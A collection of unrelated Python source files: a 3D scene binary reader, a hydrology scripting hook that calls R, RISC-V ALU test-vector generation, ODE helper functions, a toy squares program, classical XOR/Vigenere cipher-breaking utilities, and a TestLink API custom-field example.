'int8': 'b',
'uint8': 'B',
'int16': 'h',
'uint16': 'H',
'int32': 'i',
'uint32': 'I',
'int64': 'q',
'uint64': 'Q',
'float': 'f',
'double': 'd',
'char': 's'}
def read(self, typeName, times=1):
typeFormat = self.typeNames[typeName.lower()]*times
typeSize = struct.calcsize(typeFormat)
value = self.file.read(typeSize)
if typeSize != len(value):
raise BinaryReaderEOFException
return struct.unpack(typeFormat, value)
def close(self):
self.file.close()
class gt_reader(object):
def __init__(self, base_path, labelset=None):
self.base_path = base_path
if labelset != None:
self.mapping = self.load_mapping(labelset)
self.maxHeight = 48
def load_mapping(self, label_file):
mapping = dict()
# first weight for background
csvfile = open(label_file)
spamreader = csv.DictReader(csvfile, delimiter=',')
for row in spamreader:
mapping[int(row['nyu40id'])] = int(row['mappedIdConsecutive'])
csvfile.close()
return mapping
def get_gt(self, name, labelset=None):
# read out data
reader = BinaryReader(os.path.join(self.base_path, name + '.scene'))
data_dimX, data_dimY, data_dimZ = reader.read('UINT64', 3)
data = reader.read('float', data_dimX * data_dimY * data_dimZ)
data = np.expand_dims(np.reshape(data, (data_dimX, data_dimY, data_dimZ), order='F'), 0).astype(np.float32)
abs_data = np.clip(np.abs(data), -3, 3)
(num_box,) = reader.read('uint32')
gt_box = []
gt_box_ids = []
for i in range(num_box):
# gt_box
minx, miny, minz, maxx, maxy, maxz = reader.read('float', 6)
(labelid,) = reader.read('uint32')
if maxy <= self.maxHeight and miny <= self.maxHeight:
if labelset != None:
labelid = self.mapping[labelid]
gt_box.append([math.floor(minx), math.floor(miny), math.floor(minz), math.ceil(maxx), math.ceil(maxy), math.ceil(maxz), labelid])
gt_box_ids.append(i)
gt_box = np.array(gt_box)
gt_mask = []
(num_mask,) = reader.read('uint32')
for i in range(num_mask):
(labelid,) = reader.read('uint32')
dimX, dimY, dimZ = reader.read('UINT64', 3)
mask_data = reader.read('uint16', dimX * dimY * dimZ)
if i in gt_box_ids:
mask_data = np.reshape(mask_data, (dimX, dimY, dimZ), order='F').astype(np.uint8)
mask_data[mask_data > 1] = 0
gt_mask.append(mask_data)
# dict return
dict_return = {
'id': name,
'data': abs_data[:,:,:self.maxHeight,:],
'gt_box': gt_box,
'gt_mask': gt_mask,
'dim': (data_dimX, data_dimY, data_dimZ)
}
reader.close()
return dict_return
|
"""
Example Script for writing a timeseries CSV and launching an external R script via a system call. Could be adapted to many other models.
"""
import os
import json
from csv import DictWriter
from hec.script import Constants
from hec.heclib.util import HecTime
from hec.hecmath import TimeSeriesMath
def callR(scriptFile, args=[]):
args = " " + " ".join(args)
os.system(RScriptExe + " " + scriptFile + args)
def getOutputDir(opts):
d = os.path.dirname(opts.getRunDirectory())
d = d.replace("Scripting", "")
if not os.path.exists(d):
os.mkdir(d)
return d
def writeScriptConfig(alt, opts):
## Writes out a configuration file for R script to reference
config = dict()
# create run time window details
rtw = opts.getRunTimeWindow()
rtwDict = dict()
rtwDict["Start Time"] = rtw.getStartTimeString()
rtwDict["End Time"] = rtw.getEndTimeString()
config["TimeWindow"] = rtwDict
## Save realization and event seeds
if opts.isFrmCompute():
seedDict = dict()
# technically these aren't seeds as the dictionary name implies
seedDict["Event Random"] = opts.getEventRandom()
seedDict["Realization Random"] = opts.getRealizationRandom()
seedDict["Lifecycle Random"] = opts.getLifeCycleRandom()
config["Seeds"] = seedDict
indexDict = dict()
indexDict["Event Number"] = opts.getCurrentEventNumber()
indexDict["Lifecycle Number"] = opts.getCurrentLifecycleNumber()
indexDict["Realization Number"] = opts.getCurrentRealizationNumber()
config["Indices"] = indexDict
# get DSS output data:
outputDict = dict()
outputDict["Run Directory"] = opts.getRunDirectory()
outputDict["Simulation Name"] = opts.getSimulationName()
outputDict["DSS File"] = opts.getDssFilename()
outputDict["F Part"] = opts.getFpart()
config["Outputs"] = outputDict
# create list of locations mapped in
locations = alt.getInputDataLocations()
config["locations"] = list()
for loc in locations:
locDict = dict()
locDict["name"] = loc.getName()
locDict["param"] = loc.getParameter()
#locDict["type"] = loc.getType()
#locDict["dssPath"] = loc.getDssPath()
alt.addComputeWarningMessage(loc.getName())
alt.addComputeMessage(loc.getParameter())
config["locations"].append(locDict)
# write to file
d = getOutputDir(opts)
configFilename = os.path.join(d, "rScriptConfig.json")
with open(configFilename, 'w') as out:
out.write(json.dumps(config))
return configFilename
def getValueAtTime(tsc, timestamp):
# returns a value from tsc for the time that matches t; passing through once, no interpolation
# set nearest to True to receive the previous valid value instead of undefined
for t,v in zip(tsc.times, tsc.values):
if t == timestamp:
return v, True
return Constants.UNDEFINED, False
def formatTime(t):
# format expected by R script
return "%d/%d/%d %02d:%02d" % (t.month(), t.day(), t.year(), t.hour(), t.minute())
def writeTsCSV(alt, opts, outTimestep=None, timestepColumn="GMT"):
if outTimestep is None: outTimestep = alt.getTimeStep()
# stash timeseries
timeseries = dict()
locationNames = list()
for loc in alt.getInputDataLocations():
locationNames.append(loc.getName())
tsc = alt.loadTimeSeries(loc)
hm = TimeSeriesMath(tsc).transformTimeSeries(outTimestep, "0M", "AVE")
timeseries[loc.getName()] = hm.getData() # back to TSC
for t,v in zip(timeseries[loc.getName()].times, timeseries[loc.getName()].values):
ts = HecTime()
ts.set(t)
alt.addComputeMessage("\t" + ts.toString(104) + " : " + str(v))
d = os.path.dirname(opts.getRunDirectory())
d = d.replace("Scripting", "")
csvFilename = os.path.join(d, "obsTimeseries.csv")
# CSV Format is as follows
# GMT,Loc1,Loc2,Loc3
# 10/1/1948 12:00,-8.087059,8.087059,-999
# header column named GMT could be changed with timestepColumn arg, but GMT required for my purpose
header = [timestepColumn] + locationNames
with open(csvFilename, 'wb') as out:
outCSV = DictWriter(out, header)
outCSV.writeheader()
# simply loop through timestamps and output values
rtw = opts.getRunTimeWindow()
# optionally set the timestep for output not the alternative's predefined timestep (not required for WAT 1.1.0.682 and greater)
#rtw.setTimeStep(alt.getTimeStep())
i = 0
timestep = rtw.getTimeAtStep(i)
while timestep < rtw.getEndTime():
row = dict()
row[timestepColumn] = formatTime(timestep)
# use valid row to only write data that exists - hack for mixing up timesteps
validRow = False
for loc in locationNames:
row[loc], validValue = getValueAtTime(timeseries[loc], timestep.value())
validRow = validRow or validValue
if validRow:
alt.addComputeMessage(str(row))
outCSV.writerow(row)
i += 1
timestep = rtw.getTimeAtStep(i)
return csvFilename
## Scripts to run
# initRScript gets run when this script initializes; not clear if this runs more than once.
initRScript = r"C:\Projects\WAT_R_Test\testInit.R"
# runRScript runs with access to computeOptions and currentAlternative objects
runRScript = r"C:\Projects\WAT_R_Test\testRun.R"
# R executable
RScriptExe = "\"C:\\Program Files\\R\\R-4.1.2\\bin\\Rscript.exe\""
## Init R Script (optional)
#callR(initRScript)
##
#
# computeAlternative function is called when the ScriptingAlternative is computed.
# Arguments:
# currentAlternative - the ScriptingAlternative. hec2.wat.plugin.java.impl.scripting.model.ScriptPluginAlt
# computeOptions - the compute options. hec.wat.model.ComputeOptions
#
# return True if the script was successful, False if not.
# no explicit return will be treated as a successful return
#
##
def computeAlternative(currentAlternative, computeOptions):
currentAlternative.addComputeMessage("Computing ScriptingAlternative:" + currentAlternative.getName())
# write configuration for script - tells it compute timewindow and locations
# script should be expected to find this.
configFilename = writeScriptConfig(currentAlternative, computeOptions)
# write timeseries - any mapped input DataLocations will be written to CSV.
csvFilename = writeTsCSV(currentAlternative, computeOptions, outTimestep="1DAY")
# run R script
# should pass in config and csv files as args, not currently done
callR(runRScript, [configFilename, csvFilename])
return True
|
#! /usr/bin/env python3
from common import *
test_vector_a = [randImmI() for x in range(2**4)]
test_vector_b = [
randShamt() if x in [AluTypes.SLL.value,AluTypes.SRL.value,AluTypes.SRA.value]
else 4 if x in [AluTypes.ADD4A.value]
else randImmI() for x in range(2**4)
]
test_vector_op = [x for x in range(2**4)]
if __name__ == "__main__":
outfile = f"{basenameNoExt('build', __file__)}.mem"
with open(outfile, 'w') as fp:
for i in range(2**4):
test_vector = f"{test_vector_a[i] & 0xffffffff:032b}"
test_vector += f"{test_vector_b[i] & 0xffffffff:032b}"
test_vector += f"{test_vector_op[i] & 0xf:05b}"
print(test_vector, file=fp)
outfileGold = f"{basenameNoExt('build', __file__)}_gold.mem"
with open(outfileGold, 'w') as fp:
for i in range(2**4):
val = 0
if test_vector_op[i] == AluTypes.ADD.value:
val = (test_vector_a[i] + test_vector_b[i]) & 0xffffffff
elif test_vector_op[i] == AluTypes.SUB.value:
val = (test_vector_a[i] - test_vector_b[i]) & 0xffffffff
elif test_vector_op[i] == AluTypes.SLL.value:
val = (test_vector_a[i] << test_vector_b[i]) & 0xffffffff
elif test_vector_op[i] == AluTypes.XOR.value:
val = (test_vector_a[i] ^ test_vector_b[i]) & 0xffffffff
elif test_vector_op[i] == AluTypes.SRL.value:
val = ((test_vector_a[i] & 0xffffffff) >> (test_vector_b[i] & 0xffffffff))
elif test_vector_op[i] == AluTypes.SRA.value:
val = (test_vector_a[i] >> test_vector_b[i]) & 0xffffffff
elif test_vector_op[i] == AluTypes.OR.value:
val = (test_vector_a[i] | test_vector_b[i]) & 0xffffffff
elif test_vector_op[i] == AluTypes.AND.value:
val = (test_vector_a[i] & test_vector_b[i]) & 0xffffffff
elif test_vector_op[i] == AluTypes.PASSB.value:
val = (test_vector_b[i]) & 0xffffffff
elif test_vector_op[i] == AluTypes.ADD4A.value:
val = (test_vector_a[i] + 4) & 0xffffffff
elif test_vector_op[i] == AluTypes.EQ.value:
val = (test_vector_a[i] == test_vector_b[i])
elif test_vector_op[i] == AluTypes.NEQ.value:
val = (test_vector_a[i] != test_vector_b[i])
elif test_vector_op[i] == AluTypes.SLT.value:
val = (test_vector_a[i] < test_vector_b[i])
elif test_vector_op[i] == AluTypes.SLTU.value:
val = (test_vector_a[i] & 0xffffffff) < (test_vector_b[i] & 0xffffffff)
elif test_vector_op[i] == AluTypes.SGTE.value:
val = (test_vector_a[i] >= test_vector_b[i])
elif test_vector_op[i] == AluTypes.SGTEU.value:
val = (test_vector_a[i] & 0xffffffff) >= (test_vector_b[i] & 0xffffffff)
# Write gold vector
test_vector = f"{val:032b}"
test_vector += f"{1 if val == 0 else 0:01b}"
print(test_vector, file=fp) |
import inspect
from typing import Callable, List, Text
__all__ = ["infer_variable_names", "infer_separability"]
def infer_variable_names(rhs: Callable) -> List[Text]:
"""
Infer the variable names from the right-hand side function of an ODE model.
Args:
rhs: Right-hand side to infer variable names from.
Returns:
A list containing the ODE variable names.
"""
ode_spec = inspect.getfullargspec(func=rhs)
args = ode_spec.args
num_args, arg_set = len(args), set(args)
# check if the function spec is either of the standard ones
# if true, return them
if {"t", "y"}.issubset(arg_set):
return ["t", "y"]
elif {"t", "q", "p"}.issubset(arg_set):
return ["t", "q", "p"]
else:
# try to infer the variable names as the positional arguments
num_pos = len(ode_spec.defaults)
if num_args >= num_pos + 2:
return args[:-num_pos]
else:
raise ValueError("Incompatible function signature for ODE integration.")
def infer_separability(q_derivative: Callable, p_derivative: Callable) -> bool:
"""
Infer whether a Hamiltonian is separable.
Args:
q_derivative: Function returning the (vector-valued) q-derivative of the Hamiltonian.
p_derivative: Function returning the (vector-valued) p-derivative of the Hamiltonian.
Returns:
A boolean indicating whether or not the Hamiltonian is separable based on its derivatives.
"""
is_separable = False
q_set = set(infer_variable_names(q_derivative))
p_set = set(infer_variable_names(p_derivative))
# TODO: Devise more / better checks than just derivative signatures
if "q" not in p_set and "p" not in q_set:
is_separable = True
return is_separable
|
#It is found that adding two subsequent odd numbers give square of a number.
# 1+3=4 which is square of 2
#4+5=9 and so on.
# writing a program to compute a entered number square root using this method
#if we have to find square root of 6 we will add first six odds->1+3+5+7+9+11
from __future__ import print_function #to make print finction like print('hi',end=' ') work in python 2.6 and above, for compatibility
import sys
if sys.version_info[0]<3:
input=raw_input
def prime_finder(num):
start_odd=1
sum=0
while(num>=1):
sum=sum+start_odd
start_odd=start_odd+2
num=num-1
return sum
number=input("Enter the number you want to find square of-->")
print("The square of "+number+" is "+ str(prime_finder(int(number))))
|
# -*- coding: utf-8 -*-
import string
from collections import defaultdict
from commons import hamming_bin, chunked, sxor
ASCII_PRINTABLE_FREQS = {
'\n': 0.02908045733331944, '!': 0.0007948248708319754, ' ': 0.20026065368955764, '#': 8.983102066365002e-08,
'"': 0.0007286194086028653, '%': 8.983102066365002e-08, "'": 0.0034381924848805407, '&': 3.683071847209651e-06,
')': 0.0002185588732746605, '(': 0.00021918769041930606, '+': 6.288171446455501e-07, '*': 0.0004286736306069379,
'-': 0.005938998269135894, ',': 0.011704263344308288, '/': 0.00038097335863453976, '.': 0.012773971138371034,
'1': 0.00532608121514781, '0': 0.005744783602461083, '3': 0.0024439427481752624, '2': 0.002924089553622472,
'5': 0.002122886680323377, '4': 0.0019301093099791844, '7': 0.0023404574123707376, '6': 0.0016947520358404212,
'9': 0.002559824764831371, '8': 0.002376299989615534, ';': 0.001549315613385972, ':': 0.0013420754487149314,
'=': 1.2666173913574653e-05, '<': 4.617314462111611e-05, '?': 0.0009441240271749617, '>': 4.392736910452486e-05,
'A': 0.05671014368292093, '@': 2.3356065372549006e-06, 'C': 0.02176228340393453, 'B': 0.01195066983398868,
'E': 0.08188097533491699, 'D': 0.028140645195136333, 'G': 0.01255190885529049, 'F': 0.016342688096275856,
'I': 0.04845197795331158, 'H': 0.033517750430021094, 'K': 0.005907108256800298, 'J': 0.0013359669393098032,
'M': 0.019710812385038752, 'L': 0.030766495760155485, 'O': 0.05332656845860389, 'N': 0.0478192980747775,
'Q': 0.0009655038100929104, 'P': 0.014217645471456552, 'S': 0.04791676473219756, 'R': 0.048143677890393935,
'U': 0.022709821009894708, 'T': 0.06040731900037478, 'W': 0.012794632273123673, 'V': 0.007006370456661384,
'Y': 0.013791487109428197, 'X': 0.001594949771883106, '[': 0.000188914636455656, 'Z': 0.0005081740838942682,
']': 0.0001881959882903468, '\\': 1.7966204132730004e-07, '_': 6.467833487782802e-06, '^': 5.389861239819001e-07,
'`': 8.983102066365002e-08, '{': 2.4254375579185508e-06, '}': 2.6050995992458507e-06, '|': 2.964423681900451e-06,
'~': 2.6949306199095004e-07, '$': 1e-10, '\r': 1e-10, '\t': 1e-10, '\x0b': 1e-10, '\x0c': 1e-10
}
def chi2_printable(s):
"""
Run the χ² test on given string for expected distribution
of printable characters. Returns the calculated difference.
"""
obs = defaultdict(int)
for letter in s:
if letter not in string.printable:
return float('inf')
elif letter in string.ascii_lowercase:
obs[letter.upper()] += 1
else:
obs[letter] += 1
exp = ASCII_PRINTABLE_FREQS
return sum([ (obs[c]-(len(s)*exp[c]))**2 / (len(s)*exp[c]) for c in exp ])
def rotN(text, n, alphabet=string.ascii_lowercase):
"""Rotate text by N positions, based on given alphabet.
If a character is not in the alphabet it is kept as is.
"""
rotated = ''
for c in text:
try:
rotated += alphabet[(alphabet.index(c) + n) % len(alphabet)]
except ValueError:
rotated += c
return rotated
def _xor_guess_key_size(ct, top_results=5, max_key_size=64):
"""Returns a list of the most likely key sizes for a ciphertext
xored with a repeating key.
"""
distances = []
for ksize in range(2, max_key_size+1):
chunks = chunked(ct, ksize)
hammings = [hamming_bin(chunks[i], chunks[i+1])/float(ksize)
for i in range(len(chunks)-1)]
distances.append((sum(hammings) / len(hammings), ksize))
return [tup[1] for tup in sorted(distances)][:top_results]
def _xor_key_candidate(ct, keysize):
blocks = []
for i in range(keysize):
group = ct[i::keysize]
ppts = [(sxor(group, chr(i)*len(group)), i) for i in range(256)]
# list of -> ((singly_xored_text, xor_char), χ²)
results = map(lambda x: (x, chi2_printable(x[0])), ppts)
results = sorted(results, key=lambda x: x[1])
if results[0][1] == float('inf'):
# key size doesn't produce anything printable
return None
blocks.append(results[0][0])
ppt = ''.join([blocks[i%keysize][0][i/len(blocks)]
for i in range(len(ct))])
pkey = ''.join(map(chr, [b[1] for b in blocks]))
return (chi2_printable(ppt), pkey, ppt)
def _rot_key_candidate(ct, keysize, alphabet=string.ascii_lowercase):
"""Apply the same principles as repeating key xor to find possible candidate
for a Vigenere key. It will almost surely return wrong prediction but it may
be close enough that you can guess the key. Experimental.
"""
if keysize < 0:
raise Exception("Invalid keysize; must be positive")
blocks = []
for i in range(keysize):
group = ct[i::keysize]
ppts = [(rotN(group, i+1, alphabet), alphabet[ (len(alphabet)-i-1)%len(alphabet) ])
for i in range(len(alphabet))]
# list of -> ((rotated text, key char), χ²)
results = map(lambda x: (x, chi2_printable(x[0])), ppts)
results = sorted(results, key=lambda x: x[1])
if results[0][1] == float('inf'):
# key size doesn't produce anything printable
return None
blocks.append(results[0][0])
ppt = ''.join([blocks[i%keysize][0][i/len(blocks)]
for i in range(len(ct))])
pkey = ''.join([b[1] for b in blocks])
return (chi2_printable(ppt), pkey, ppt)
# TODO: Filter out duplicate keys
def repeating_xor_decrypt(ct, top_results=5, keysize=None, key=None):
"""Tries to decrypt english text that has been XORed with a repeating key.
Accepts the binary ciphertext and, optionally, the keysize if it's known.
If no keysize given tries to guess based on hamming binary distance.
Returns a list of (key, plaintext) tuples, up to specified number of top results,
sorted most to least likely. Can return less if not enough candidates.
"""
if key:
return [(key, sxor(ct, key*(len(ct)/len(key))))]
if keysize:
if type(keysize) not in [int,float] or keysize < 1:
raise Exception("Keysize invalid")
ksizes = [keysize]
else:
ksizes = _xor_guess_key_size(ct)
candidates = []
for ksize in ksizes:
candidate = _xor_key_candidate(ct, ksize)
if candidate:
candidates.append(candidate)
return [(c[1], c[2]) for c in sorted(candidates)][:top_results]
def vigenere_decrypt(ct, key, alphabet=string.ascii_lowercase):
"""Decrypts Vigenere ciphertext with given key. Skips over characters
not in the alphabet.
"""
if not all([c in alphabet for c in key]):
raise Exception("Key must only contain alphabet characters")
ki = 0
pt = ''
for c in ct:
if c not in alphabet:
pt += c
else:
rot = (len(alphabet) - alphabet.index(key[ki])) % len(alphabet)
pt += alphabet[(alphabet.index(c) + rot) % len(alphabet)]
ki = (ki + 1) % len(key)
return pt
def _sort_counter_dict(d, reverse):
ks = sorted(d, key=lambda x: d[x], reverse=reverse)
return [(k, d[k]) for k in ks]
def count_ngrams(ct, n):
"""Counts ngrams in ciphertext and returns a dictionary of ngram -> count."""
if n < 1:
raise ValueError("n must be positive")
ngrams = defaultdict(int)
for i in range(0, len(ct)-(n-1)):
ngrams[ct[i:i+n]] += 1
return dict(ngrams)
def sorted_ngrams(ct, n, reverse=True):
"""Returns a list of tuples (ngram, count) sorted by count.
Default sort is descending. Pass reverse=False to sort in ascending order.
"""
ngrams = count_ngrams(ct, n)
return _sort_counter_dict(ngrams, reverse)
def count_doubles(ct):
"""Counts doubled letters in ciphertext and returns a dictionary of letters -> count.
Each letter can only exist in one double, e.g. 'abccc' will return {'cc': 1}.
"""
doubles = defaultdict(int)
i = 0
while True:
if i >= len(ct)-1:
break
elif ct[i] == ct[i+1]:
doubles['%s%s' % (ct[i], ct[i])] += 1
i += 2
else:
i += 1
return dict(doubles)
def sorted_doubles(ct, reverse=True):
"""Returns a list of tuples (doubles, count) sorted by count.
Default sort is descending. Pass reverse=False to sort in ascending order.
"""
doubles = count_doubles(ct)
return _sort_counter_dict(doubles, reverse)
|
#! /usr/bin/python
# -*- coding: UTF-8 -*-
# Copyright 2013-2018 Luiko Czub, TestLink-API-Python-client developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------
"""
Shows how to use the TestLinkAPI for custom fields
This example requires a special existing project with special custom fields
assigned
a) run example TestLinkExample.py
- this creates a project like NEW_PROJECT_API-34
b) load custom field definitions customFields_ExampleDefs.xml
TL - Desktop - System - Define Custom Fields - Import
c) assign custom fields to project NEW_PROJECT_API-34
TL - Desktop - Test Project - Assign Custom Fields
d) load keyword definitions keywords_ExampleDefs.xml
TL - Desktop - Test Project - Keyword Management
Script works with:
TestProject NEW_PROJECT_API-34
- TestSuite B - First Level
- TestCase TESTCASE_B
- TestPlan TestPlan_API A (Platform Small Bird)
- Build TestlinkAPIClient v0.x.y
Script creates custom values for TestCase TESTCASE_B
- scope test specification and test execution
Script returns custom field values from TestPlan and TestSuite, if the user has
added manually some values.
Cause of missing knowledge, how ids of kind
- requirement and requirement specifications
- testplan - testcase link
could be requested via api, these example does not work currently.
Script adds keywords KeyWord01 KeyWord02 KeyWord03 to test case TESTCASE_B,
removes keyword KeyWord02 again.
Script adds keywords KeyWord01 KeyWord02 to test case TESTCASE_AA,
removes keyword KeyWord01 again.
"""
from testlink import TestlinkAPIClient, TestLinkHelper
from testlink.testlinkerrors import TLResponseError
import sys, os.path
from platform import python_version
# precondition a)
# SERVER_URL and KEY are defined in environment
# TESTLINK_API_PYTHON_SERVER_URL=http://YOURSERVER/testlink/lib/api/xmlrpc.php
# TESTLINK_API_PYTHON_DEVKEY=7ec252ab966ce88fd92c25d08635672b
#
# alternative precondition b)
# SERVEUR_URL and KEY are defined as command line arguments
# python TestLinkExample.py --server_url http://YOURSERVER/testlink/lib/api/xmlrpc.php
# --devKey 7ec252ab966ce88fd92c25d08635672b
#
# ATTENTION: With TestLink 1.9.7, cause of the new REST API, the SERVER_URL
# has changed from
# (old) http://YOURSERVER/testlink/lib/api/xmlrpc.php
# to
# (new) http://YOURSERVER/testlink/lib/api/xmlrpc/v1/xmlrpc.php
tl_helper = TestLinkHelper()
tl_helper.setParamsFromArgs('''Shows how to use the TestLinkAPI for CustomFields.
=> requires an existing project NEW_PROJECT_API-*''')
myTestLink = tl_helper.connect(TestlinkAPIClient)
myPyVersion = python_version()
myPyVersionShort = myPyVersion.replace('.', '')[:2]
NEWTESTPLAN_A="TestPlan_API A"
# NEWTESTPLAN_B="TestPlan_API B"
# NEWTESTPLAN_C="TestPlan_API C - DeleteTest"
# NEWPLATFORM_A='Big Birds %s' % myPyVersionShort
NEWPLATFORM_B='Small Birds'
# NEWPLATFORM_C='Ugly Birds'
NEWTESTSUITE_A="A - First Level"
NEWTESTSUITE_B="B - First Level"
NEWTESTSUITE_AA="AA - Second Level"
NEWTESTCASE_AA="TESTCASE_AA"
NEWTESTCASE_B="TESTCASE_B"
# myApiVersion='%s v%s' % (myTestLink.__class__.__name__ , myTestLink.__version__)
# NEWBUILD_A='%s' % myApiVersion
# NEWBUILD_B='%s' % myApiVersion
# NEWBUILD_C='%s - DeleteTest' % myApiVersion
# NEWBUILD_D='%s - copyTestersTest' % myApiVersion
this_file_dirname=os.path.dirname(__file__)
NEWATTACHMENT_PY= os.path.join(this_file_dirname, 'TestLinkExample.py')
NEWATTACHMENT_PNG=os.path.join(this_file_dirname, 'PyGreat.png')
# Servers TestLink Version
myTLVersion = myTestLink.testLinkVersion()
myTLVersionShort = myTLVersion.replace('.', '')
NEWPROJECT="NEW_PROJECT_API-%s" % myPyVersionShort
NEWPREFIX="NPROAPI%s" % myPyVersionShort
ITSNAME="myITS"
# used connection settings
print( myTestLink.connectionInfo() )
print( "" )
# get information - TestProject
newProject = myTestLink.getTestProjectByName(NEWPROJECT)
print( "getTestProjectByName", newProject )
newProjectID = newProject['id']
print( "Project '%s' - id: %s" % (NEWPROJECT,newProjectID) )
response = myTestLink.getProjectKeywords(newProjectID)
print("getProjectKeywords", response)
# get information - TestPlan
newTestPlan = myTestLink.getTestPlanByName(NEWPROJECT, NEWTESTPLAN_A)
print( "getTestPlanByName", newTestPlan )
newTestPlanID_A = newTestPlan[0]['id']
print( "Test Plan '%s' - id: %s" % (NEWTESTPLAN_A,newTestPlanID_A) )
response = myTestLink.getTotalsForTestPlan(newTestPlanID_A)
print( "getTotalsForTestPlan", response )
response = myTestLink.getBuildsForTestPlan(newTestPlanID_A)
print( "getBuildsForTestPlan", response )
newBuildID_A = response[0]['id']
newBuildName_A = response[0]['name']
# get information - TestSuite
response = myTestLink.getTestSuitesForTestPlan(newTestPlanID_A)
print( "getTestSuitesForTestPlan", response )
newTestSuiteID_A=response[0]['id']
newTestSuiteID_AA=response[1]['id']
newTestSuiteID_B=response[2]['id']
newTestSuite = myTestLink.getTestSuiteByID(newTestSuiteID_B)
print( "getTestSuiteByID", newTestSuite )
# get informationen - TestCase_B
response = myTestLink.getTestCaseIDByName(NEWTESTCASE_B, testprojectname=NEWPROJECT)
print( "getTestCaseIDByName", response )
newTestCaseID_B = response[0]['id']
tc_b_full_ext_id = myTestLink.getTestCase(newTestCaseID_B)[0]['full_tc_external_id']
print( "Test Case '%s' - id: %s - ext-id %s" % (NEWTESTCASE_B, newTestCaseID_B, tc_b_full_ext_id) )
# get informationen - TestCase_AA
response = myTestLink.getTestCaseIDByName(NEWTESTCASE_AA, testprojectname=NEWPROJECT)
print( "getTestCaseIDByName", response )
newTestCaseID_AA = response[0]['id']
tc_aa_full_ext_id = myTestLink.getTestCase(newTestCaseID_AA)[0]['full_tc_external_id']
print( "Test Case '%s' - id: %s - ext-id %s" % (NEWTESTCASE_AA, newTestCaseID_AA, tc_aa_full_ext_id) )
# add keywords to TestCase B and TestCase AA
response = myTestLink.addTestCaseKeywords(
{tc_b_full_ext_id : ['KeyWord01', 'KeyWord03', 'KeyWord02'],
tc_aa_full_ext_id : ['KeyWord01', 'KeyWord02', 'KeyWord03']})
print( "addTestCaseKeywords", response )
# remove keywords from TestCase B and TestCase AA
response = myTestLink.removeTestCaseKeywords(
{tc_b_full_ext_id : ['KeyWord02'],
tc_aa_full_ext_id : ['KeyWord01', 'KeyWord03']})
print( "removeTestCaseKeywords", response )
# list test cases with assigned keywords B
response = myTestLink.getTestCasesForTestSuite(newTestSuiteID_B, True,
'full', getkeywords=True)
print( "getTestCasesForTestSuite B (deep=True)", response )
response = myTestLink.getTestCasesForTestSuite(newTestSuiteID_B, False,
'full', getkeywords=True)
print( "getTestCasesForTestSuite B (deep=False)", response )
# get informationen - TestCase_B again
newTestCase_B = myTestLink.getTestCase(testcaseid=newTestCaseID_B)[0]
print( "getTestCase B", newTestCase_B )
# return keyword list for TestCase_B
response = myTestLink.listKeywordsForTC(newTestCaseID_B)
print( "listKeywordsForTC B", response )
# return keyword lists for all test cases of test newTestSuite_B
response = myTestLink.listKeywordsForTS(newTestSuiteID_B)
print( "listKeywordsForTS B", response )
# list test cases with assigned keywords AA
response = myTestLink.getTestCasesForTestSuite(newTestSuiteID_A, True,
'full', getkeywords=True)
print( "getTestCasesForTestSuite A (deep=True)", response )
response = myTestLink.getTestCasesForTestSuite(newTestSuiteID_A, False,
'full', getkeywords=True)
print( "getTestCasesForTestSuite A (deep=False)", response )
# get informationen - TestCase_AA again
newTestCase_AA = myTestLink.getTestCase(testcaseid=newTestCaseID_AA)[0]
print( "getTestCase AA", newTestCase_AA )
# return keyword list for TestCase_AA
response = myTestLink.listKeywordsForTC(newTestCaseID_AA)
print( "listKeywordsForTC AA", response )
# return keyword lists for all test cases of test newTestSuite_A
response = myTestLink.listKeywordsForTS(newTestSuiteID_AA)
print( "listKeywordsForTS AA", response )
response = myTestLink.getTestCaseKeywords(testcaseid=newTestCaseID_B)
print("getTestCaseKeywords B", response)
response = myTestLink.getTestCaseKeywords(testcaseid=newTestCaseID_AA)
print("getTestCaseKeywords AA", response)
# new execution result with custom field data
# TC_B passed, explicit build and some notes , TC identified with internal id
newResult = myTestLink.reportTCResult(newTestCaseID_B, newTestPlanID_A,
newBuildName_A, 'p', "bugid 4711 is assigned",
platformname=NEWPLATFORM_B, bugid='4711',
customfields={'cf_tc_ex_string' : 'a custom exec value set via api',
'cf_tc_sd_listen' : 'ernie'})
print( "reportTCResult", newResult )
# get execution results
lastResult = myTestLink.getLastExecutionResult(newTestPlanID_A, newTestCaseID_B,
options={'getBugs' : True})[0]
print( "getLastExecutionResult", lastResult )
# map of used ids
args = {'devKey' : myTestLink.devKey,
'testprojectid' : newProjectID,
'testcaseexternalid' : newTestCase_B['full_tc_external_id'],
'version' : int(newTestCase_B['version']),
'tcversion_number' : lastResult['tcversion_number'],
'executionid' : lastResult['id'],
'linkid' : 779,
'testsuiteid': newTestSuiteID_B,
'testplanid': lastResult['testplan_id'],
'reqspecid': 7789,
'requirementid': 7791,
'buildid':newBuildID_A}
# get CustomField Value - TestCase Execution
response = myTestLink.getTestCaseCustomFieldExecutionValue(
'cf_tc_ex_string', args['testprojectid'], args['tcversion_number'],
args['executionid'] , args['testplanid'] )
print( "getTestCaseCustomFieldExecutionValue", response )
# update CustomField Value - TestCase SpecDesign
response = myTestLink.updateTestCaseCustomFieldDesignValue(
args['testcaseexternalid'], args['version'],
args['testprojectid'],
{'cf_tc_sd_string' : 'A custom SpecDesign value set via api',
'cf_tc_sd_list' : 'bibo'})
print( "updateTestCaseCustomFieldDesignValue", response )
# get CustomField Value - TestCase SpecDesign
#response = myTestLink._callServer('getTestCaseCustomFieldDesignValue', args)
response = myTestLink.getTestCaseCustomFieldDesignValue(
args['testcaseexternalid'], args['version'],
args['testprojectid'], 'cf_tc_sd_string', 'full')
print( "getTestCaseCustomFieldDesignValue full", response )
response = myTestLink.getTestCaseCustomFieldDesignValue(
args['testcaseexternalid'], args['version'],
args['testprojectid'], 'cf_tc_sd_string', 'value')
print( "getTestCaseCustomFieldDesignValue value", response )
response = myTestLink.getTestCaseCustomFieldDesignValue(
args['testcaseexternalid'], args['version'],
args['testprojectid'], 'cf_tc_sd_list', 'simple')
print( "getTestCaseCustomFieldDesignValue simple", response )
# get CustomField Value - TestCase Testplan Design
response = myTestLink.getTestCaseCustomFieldTestPlanDesignValue(
'cf_tc_pd_string', args['testprojectid'], args['tcversion_number'],
args['testplanid'], args['linkid'])
